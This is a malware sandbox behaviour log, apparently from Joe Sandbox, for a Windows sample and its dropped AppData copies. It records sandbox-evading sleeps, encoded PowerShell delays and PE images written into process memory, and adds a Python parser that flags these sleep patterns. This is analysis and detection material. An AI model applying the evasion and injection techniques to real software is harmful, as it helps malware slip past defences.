                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197797s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197671s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197536s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197391s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197265s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197152s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196956s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196797s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196679s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196250s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196094s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195921s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195809s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195688s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195436s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195328s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195200s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195076s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194953s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194844s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194734s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194625s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194515s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194406s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194297s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194187s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194077s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1193969s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1193844s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1193733s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1193623s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044 Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044 Thread sleep count: 36 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6020 Thread sleep count: 9624 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592 Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592 Thread sleep count: 43 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5984 Thread sleep count: 9758 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984 Thread sleep count: 40 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 5388 Thread sleep count: 9746 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040 Thread sleep time: -15679732462653109s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980 Thread sleep time: -21213755684765971s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980 Thread sleep count: 38 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1668 Thread sleep count: 9716 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5892 Thread sleep time: -19369081277395017s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 836 Thread sleep count: 844 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1199662s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1199537s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1199405s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1199200s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1198760s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1198310s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1197900s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1197786s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1197349s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1196761s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1196360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1196005s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1195758s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1195505s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194897s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194753s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194348s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199875
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199624
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199498
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199344
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199203
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199047
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198938
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198794
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198680
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198420
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198297
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198170
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198031
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197921
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197797
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197671
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197536
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197391
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197265
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197152
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196956
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196797
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196679
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196250
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196094
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195921
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195809
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195688
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195436
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195328
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195200
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195076
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194953
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194844
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194734
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194625
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194515
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194406
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194297
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194187
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194077
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193969
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193844
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193733
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193623
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199662
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199537
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199405
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199200
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198760
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198310
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197900
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197786
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197349
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196761
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196360
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196005
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195505
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194897
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194753
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194348
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9732
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9388
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9481
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 9624
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 9746
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8218
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9716
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9319
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 844
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199875
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199624
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199498
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199344
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199203
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199047
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198938
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198794
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198680
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198420
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198297
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198170
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198031
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197921
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197797
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197671
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197536
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197391
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197265
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197152
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196956
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196797
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196679
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196250
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196094
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195921
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195809
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195688
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195436
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195328
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195200
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195076
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194953
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194844
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194734
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194625
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194515
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194406
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194297
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194187
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194077
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193969
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193844
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193733
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193623
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199662
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199537
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199405
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199200
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198760
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198310
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197900
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197786
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197349
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196761
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196360
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196005
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195505
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194897
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194753
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194348
                Source: Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8j
                Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.609344708.00000000010AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard
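The sleep figures above are relative wait intervals as the sandbox recorded them: 922337203685477 is (2^63 - 1) ticks of 100 ns written out in milliseconds, the largest wait the interval field can hold, so a thread requesting it is parking itself rather than timing anything; the run 1200000, 1199875, 1199624 ... is one 20-minute request re-armed with the remaining time every time the thread is woken; and the "sleep count: 9624 > 30" lines are the loop counters around those waits. The Python below is an added example, not part of the Joe Sandbox report, that parses lines in the shape printed above and flags those three patterns per source image. The sample lines are constructed here from the report's own values, the thresholds are the report's own (30 iterations, 3 minutes), and treating the numbers as milliseconds is an assumption about the unit.

```python
import re
from collections import defaultdict

# Constructed sample lines in the shape the report prints them (the source path is
# glued to the observation text exactly as in the export above).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1200000",
    r"Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199875",
    r"Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199624",
    r"Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592Thread sleep time: -4611686018427385s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592Thread sleep count: 43 > 30",
    r"Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5984Thread sleep count: 9758 > 30",
    r"Source: C:\Windows\System32\conhost.exeLast function: Thread delayed",
]

# (2**63 - 1) 100-ns ticks expressed in milliseconds: the largest relative wait the
# interval field can encode. A thread asking for it is not timing anything; it is
# parking itself until something else wakes it. (Unit = ms is an assumption.)
INT64_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477
LONG_SLEEP_MS = 3 * 60 * 1000                 # the report's ">= 3 min" threshold
YEAR_MS = 365 * 24 * 3600 * 1000
LOOP_COUNT = 30                               # the report's "> 30" threshold

DELAY_RE = re.compile(
    r"^Source: (?P<image>.+?)(?: TID: (?P<tid>\d+))?"
    r"Thread (?:sleep time: -|delayed: delay time: )(?P<ms>\d+)"
)
COUNT_RE = re.compile(
    r"^Source: (?P<image>.+?) TID: (?P<tid>\d+)Thread sleep count: (?P<n>\d+)"
)


def classify_delay(ms):
    """Bucket one requested wait (milliseconds) the way an analyst reads it."""
    if ms == INT64_MAX_MS:
        return "int64-max"        # parked thread, not a timer
    if ms > YEAR_MS:
        return "unbounded"        # absurd value, same intent
    if ms >= LONG_SLEEP_MS:
        return "long"             # outruns a typical sandbox run
    return "short"


def is_countdown(delays):
    """True when three or more consecutive waits shrink step by step: one long
    request being re-armed with the remaining time after each wake-up."""
    run = 0
    for prev, cur in zip(delays, delays[1:]):
        run = run + 1 if 0 < prev - cur < LONG_SLEEP_MS else 0
        if run >= 2:
            return True
    return False


def summarize(lines):
    """Aggregate the report's sleep observations per source image and flag them."""
    per_image = defaultdict(lambda: {"delays": [], "max_sleep_count": 0,
                                     "buckets": defaultdict(int)})
    for line in lines:
        m = DELAY_RE.match(line)
        if m:
            rec = per_image[m["image"]]
            ms = int(m["ms"])
            rec["delays"].append(ms)
            rec["buckets"][classify_delay(ms)] += 1
            continue
        m = COUNT_RE.match(line)
        if m:
            rec = per_image[m["image"]]
            rec["max_sleep_count"] = max(rec["max_sleep_count"], int(m["n"]))
    verdicts = {}
    for image, rec in per_image.items():
        flags = []
        if rec["buckets"]["int64-max"] or rec["buckets"]["unbounded"]:
            flags.append("parked-thread")
        if rec["buckets"]["long"]:
            flags.append("long-sleep")
        if is_countdown(rec["delays"]):
            flags.append("re-armed-sleep-loop")
        if rec["max_sleep_count"] > LOOP_COUNT:
            flags.append("sleep-loop-count")
        verdicts[image] = {"flags": flags, "samples": len(rec["delays"]),
                           "max_sleep_count": rec["max_sleep_count"]}
    return verdicts


if __name__ == "__main__":
    for image, v in summarize(SAMPLE_LINES).items():
        print(f"{image}: {', '.join(v['flags']) or 'nothing notable'} ({v['samples']} waits)")
```

The conhost.exe "Last function: Thread delayed" line carries no interval and is deliberately left out of the verdicts; only the three sample-side images end up flagged.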

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeMemory written: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeMemory written: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe base: 400000 value starts with: 4D5A
